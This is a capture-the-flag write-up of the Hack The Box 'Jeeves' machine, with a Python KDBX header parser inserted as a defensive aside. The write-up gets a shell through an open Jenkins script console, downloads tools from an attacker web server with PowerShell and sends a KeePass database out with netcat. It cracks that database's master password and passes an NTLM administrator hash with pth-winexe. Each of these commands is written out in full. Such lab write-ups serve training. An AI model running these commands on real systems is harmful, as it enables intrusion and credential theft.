Donald Ashdown

Hack the Box Jeeves



Summary

This was a fantastic Windows machine that required deeper enumeration to identify a service running on the non-standard port 50000. Through an unauthenticated connection we execute code from the provided script console to obtain a foothold as a user. Running winPEAS shows there is a KeePass database, and the privilege escalation exploit checker shows a Juicy Potato exploit.

Processes/Technique
  • Web app code execution

  • KeePass database cracking

  • Windows data exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH.kdbx

  • Linux ---> Windows file transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe') - with a Linux http.server

  • Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe

  • Alternate data stream


Tools Used
  • winPEAS.exe

  • John the Ripper

  • rpcdump.py (Impacket)

  • Dirbuster

  • Python http.server

  • keepass2john

  • pth-winexe

Enumeration

As always we start off with a basic nmap scan, followed by version enumeration and the default nmap scanning scripts. These are denoted by:

-sC - default scripts

-sV - service version detection

└─$ nmap 10.129.1.109                          
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2


└─$ nmap -sC -sV 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 - HTTP web server

Port 135 - MSRPC

Port 445 - SMB file share

Port 50000 - Jetty 9.4.z-SNAPSHOT (HTTP)


Enumeration Port 80

Port 80 is running Microsoft IIS httpd 10.0, which is very new, so we are unlikely to find public CVEs. Furthermore, the website returns constant errors and has no real content.



Enumeration Port 135

Using Impacket's rpcdump.py I scraped the service for information and found nothing particularly useful.


Enumeration Port 445

smbclient connections required authentication.

smbmap -H also required authentication.


Enumeration Port 50000

Port 50000 is looking like the most likely attack vector.


The default page returns an error and there is no obvious default directory, so the next step in the process is to check for hidden directories with dirbuster.

We see that /askjeeves/ is eventually found.


Exploiting Jenkins

This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that apps like Jenkins and other build automation servers, which turn up on Hack The Box and in the OSCP PWK labs, can often be exploited by executing code on the platform through the native script builder or console once you have authenticated access.


After poking around, it appeared that this app uses the Groovy language, so my next focus was "Groovy reverse shells". This turns up an immediate result on GitHub.


This part is simple enough: we copy and paste the code into the script console, entering our specific network information.


Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user-level privileges and we capture our first flag.


Privilege escalation

The first place to always start with privilege escalation is by uploading winPEAS, a Windows enumeration tool focused on finding privilege escalation opportunities.

This is done by spinning up a python3 http.server.


We can download the file onto Windows with the following command, run on the target Windows machine.

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe')

Referenced from here

https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/

Running winPEAS provides something obvious right at the end of the results screen relating to KeePass, a common password manager.


Some simple research on KeePass database vulnerabilities yields almost immediate results.

https://tzusec.com/cracking-keepass-database/


Acquiring the KeePass .kdbx file

From here we browse to the suggested KeePass location of C:\users\kohsuke\documents\CEH.kdbx.


The next step is to exfiltrate this file to my local machine. After an initial search for binaries on Windows that would help with this, I decided to upload nc.exe. I used the link below to reference the file transfer commands with nc.exe.

https://hackersinterview.com/oscp/oscp-cheatsheet-linux-file-transfer-techniques/


The command to download nc.exe onto the Windows machine, served from a python3 http.server.

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe', 'nc.exe')


Netcat command to upload CEH.kdbx from the target to a listening server (run on the Windows machine).

nc -nv 10.10.14.102 6363 < CEH.kdbx

Netcat command to receive the upload (run on the attacking machine).

nc -nlvp 6363 > CEH.kdbx



Crack the database

Using this blog I found online, https://tzusec.com/cracking-keepass-database/, we can work towards opening this file and pivoting to root.


Extract the hash

Firstly we extract the hash of the master password using keepass2john, the KeePass module that ships with John the Ripper.


keepass2john SecretDB.kdbx
└─$ keepass2john CEH.kdbx 
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
└─$ keepass2john CEH.kdbx > hash.txt


└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
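As an added example (my own code, not from this write-up, KeePass or John), a parser for the unencrypted KDBX 3.x outer header, which is where keepass2john reads the seeds, IV and transform rounds that make up the $keepass$ line above; the 6000 that john reports as Cost 1 is the TransformRounds field, and the audit helper flags databases below an assumed policy floor (MIN_ROUNDS is my assumption, not a KeePass constant) so a defender can find weak-KDF vaults in their own fleet.

```python
import struct

KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67  # file signatures of KDBX 2.x/3.x
AES_CBC_UUID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")  # KeePass AES cipher ID
# Outer-header field IDs of KDBX 3.x (the format keepass2john labels as version 2)
FIELD_NAMES = {2: "CipherID", 3: "CompressionFlags", 4: "MasterSeed", 5: "TransformSeed",
               6: "TransformRounds", 7: "EncryptionIV", 8: "ProtectedStreamKey",
               9: "StreamStartBytes", 10: "InnerRandomStreamID"}
MIN_ROUNDS = 60000  # policy floor for AES-KDF rounds: an assumption for this example

def parse_kdbx3_header(data: bytes) -> dict:
    """Parse the unencrypted outer header of a KDBX 3.x file (the bytes keepass2john reads)."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX 2.x/3.x file")
    if major != 3:
        raise ValueError(f"unsupported KDBX major version {major}")
    fields, pos = {}, 12
    while True:  # each field: 1-byte ID, 2-byte little-endian length, payload
        field_id, length = struct.unpack_from("<BH", data, pos)
        pos += 3
        payload, pos = data[pos:pos + length], pos + length
        if field_id == 0:  # EndOfHeader; the encrypted payload starts at pos
            break
        fields[FIELD_NAMES.get(field_id, f"Unknown{field_id}")] = payload
    cipher = "AES-256-CBC" if fields["CipherID"] == AES_CBC_UUID else fields["CipherID"].hex()
    return {"version": f"{major}.{minor}", "cipher": cipher,
            "transform_rounds": struct.unpack("<Q", fields["TransformRounds"])[0],
            "master_seed": fields["MasterSeed"].hex(), "header_end": pos}

def kdf_findings(data: bytes) -> list:
    """Audit one database header; an empty list means nothing to flag."""
    info = parse_kdbx3_header(data)
    if info["transform_rounds"] < MIN_ROUNDS:
        return [f"transform rounds {info['transform_rounds']} below policy minimum {MIN_ROUNDS}"]
    return []

def build_sample_header(rounds: int) -> bytes:
    """Constructed KDBX 3.1 header for testing; seeds and IV are filler, not a real database."""
    def field(fid, payload):
        return struct.pack("<BH", fid, len(payload)) + payload
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)  # version 3.1
    hdr += field(2, AES_CBC_UUID) + field(3, struct.pack("<I", 1))  # AES cipher, gzip
    hdr += field(4, bytes(range(32))) + field(5, bytes(range(32, 64)))  # seeds (filler)
    hdr += field(6, struct.pack("<Q", rounds)) + field(7, bytes(16))  # rounds, IV (filler)
    hdr += field(8, bytes(32)) + field(9, bytes(32)) + field(10, struct.pack("<I", 2))
    hdr += field(0, b"\r\n\r\n")  # EndOfHeader marker
    return hdr + bytes(32)  # stand-in for the first encrypted block
```

Pointing parse_kdbx3_header at the first few hundred bytes of a real .kdbx gives the same seed and round values keepass2john prints, which makes the two easy to cross-check.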

Open the cracked DB

From here I installed keepass2 on my Kali Linux machine.


I tried all the passwords and stuffed them everywhere I could. But at the end of the day, the "Backup stuff" password looked like a possible hash with no username, so I proceeded to attempt to pass the hash, initially with Impacket. However, this was constantly erroring out, so I learned about a new tool, "pth-winexe". This was successful with the "administrator" username prepended to the hash and separated by a : or % character. From here we captured the root flag.


sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe


Catch 22

Wait a sec! That is not root!


The old "alternate data stream" trick. I learned about a variation of this back in high school.



